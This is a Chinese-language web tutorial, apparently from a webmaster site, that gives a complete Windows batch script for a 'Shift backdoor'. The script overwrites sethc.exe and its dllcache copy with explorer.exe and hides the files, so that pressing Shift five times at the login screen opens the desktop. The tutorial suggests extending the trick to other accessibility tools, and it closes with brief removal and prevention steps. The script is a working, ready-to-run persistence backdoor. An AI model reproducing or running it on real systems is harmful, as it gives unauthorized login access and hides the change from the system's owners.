| 在cmd下輸入以下命令... 下面再打開記事本把底下的代碼粘貼進(jìn)去。 代碼如下: @echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后門 echo.sproink @copy c:\windows\explorer.exe c:\windows\system32\sethc.exe @copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe @attrib c:\windows\system32\sethc.exe +h @attrib c:\windows\system32\dllcache\sethc.exe +h echo 使用方法:本文件執(zhí)行完畢后, echo 在終端界面按Shift 5次即可登陸系統(tǒng)! echo. copy c:\windows\explorer.exe c:\windows\system32\sethc.exe echo 完成百分之 50 copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe echo 完成百分之 80 attrib c:\windows\system32\sethc.exe +h echo 完成百分之 90 attrib c:\windows\system32\dllcache\sethc.exe +h echo 完成百分之 100 cls echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo 后門安裝完畢! echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo. & pause exit 其實(shí)原理很簡單,就是利用了explorer.exe 這個(gè)資源管理器進(jìn)程替換調(diào)用的shift 默認(rèn)啟動(dòng)程序,然后還覆蓋了windows的文件保護(hù)原文件(防止文件保護(hù)系統(tǒng)檢測到文件修改,會(huì)還原這些原來的程序,造成copy文件失去作用),當(dāng)調(diào)用shift是其實(shí)調(diào)用的真正程序是桌面進(jìn)程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^ 下面介紹如何清除此后門... 打開控制面板--輔助功能選項(xiàng)--粘滯鍵--設(shè)置--去掉使用快捷鍵的勾  還有要改下copy.exe的權(quán)限,不過在這里推薦大家把c盤所有的程序都 改下,只有administrator才能訪問 shift后門的預(yù)防解決辦法:預(yù)防很簡單的,連敲5次shift,然后在彈出的設(shè)置里面取消連滯鍵 已經(jīng)中了的話 attrib c:\windows\system32\sethc.exe -h attrib c:\windows\system32\dllcache\sethc.exe -h 拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下 還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權(quán)限或拒絕訪問等,也可:)建議利用前者恢復(fù)。。。 收工! |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
